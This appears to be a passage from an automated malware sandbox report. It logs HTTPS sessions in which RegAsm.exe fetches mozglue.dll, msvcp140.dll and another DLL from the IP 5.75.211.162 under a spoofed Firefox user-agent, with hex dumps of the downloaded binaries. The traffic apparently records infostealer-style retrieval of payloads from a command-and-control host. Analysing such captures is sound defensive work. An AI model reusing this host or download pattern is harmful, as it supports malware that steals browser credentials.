                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:44 UTC262INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:44 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 685392
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:44 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:44 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                      Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                      Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                      Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                      Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                      Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                      Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                      Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                      Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                      2024-09-26 17:05:44 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                      Data Ascii: ,0<48%8A)$


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.5497275.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:45 UTC196OUTGET /mozglue.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:46 UTC262INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:45 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 608080
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thursday, 26-Sep-2024 17:05:45 GMT
                                                                                                      Cache-Control: no-store, no-cache
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-09-26 17:05:46 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                      Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                      Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                      Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                      Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                      Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                      Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                      2024-09-26 17:05:46 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                      Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.5497285.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:47 UTC197OUTGET /msvcp140.dll HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Connection: Keep-Alive
